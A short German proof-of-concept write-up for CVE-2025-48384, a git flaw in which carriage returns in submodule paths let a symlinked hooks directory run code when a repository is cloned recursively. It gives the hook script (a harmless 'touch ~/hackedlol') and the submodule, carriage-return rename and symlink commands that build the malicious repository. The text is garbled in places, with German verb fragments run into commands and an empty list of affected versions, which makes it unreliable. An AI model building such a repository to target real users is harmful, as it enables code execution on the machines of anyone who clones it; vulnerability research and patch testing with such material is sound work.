
PoC für CVE-2025-48384
CVE-2025-48384 hat die Form einer unsachgemäßen Linkauflösung (Link-Following) Schwachstelle in git. Insbesondere werden Dateinamen mit Wagenrückläufen in .git/config falsch geparst, und das Einfügen eines Symlinks, der auf eine git-Hook-ausführbare Datei in einem Submodul zeigt, als Submodul-Hooks-Verzeichnis kann zu beliebiger Codeausführung führen, wenn das Repository mit git clone --recursive geklont wird.
Git für Microsoft Windows ist von dieser Schwachstelle nicht betroffen, sodass hauptsächlich bestimmte git-Versionen auf Linux und MacOS verwundbar sind. Betroffene Versionen sind:
post-checkout Git-Hook, der Code ausführt, wenn das poc-Repository rekursiv geklont wird:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git sub hinzugit mv sub $(printf "sub\r") hinzuprintf "\tpath = \"sub\r\"\n" in .gitmodules ein und entferne den ursprünglichen Pfad.ln -s .git/modules/sub/hooks sub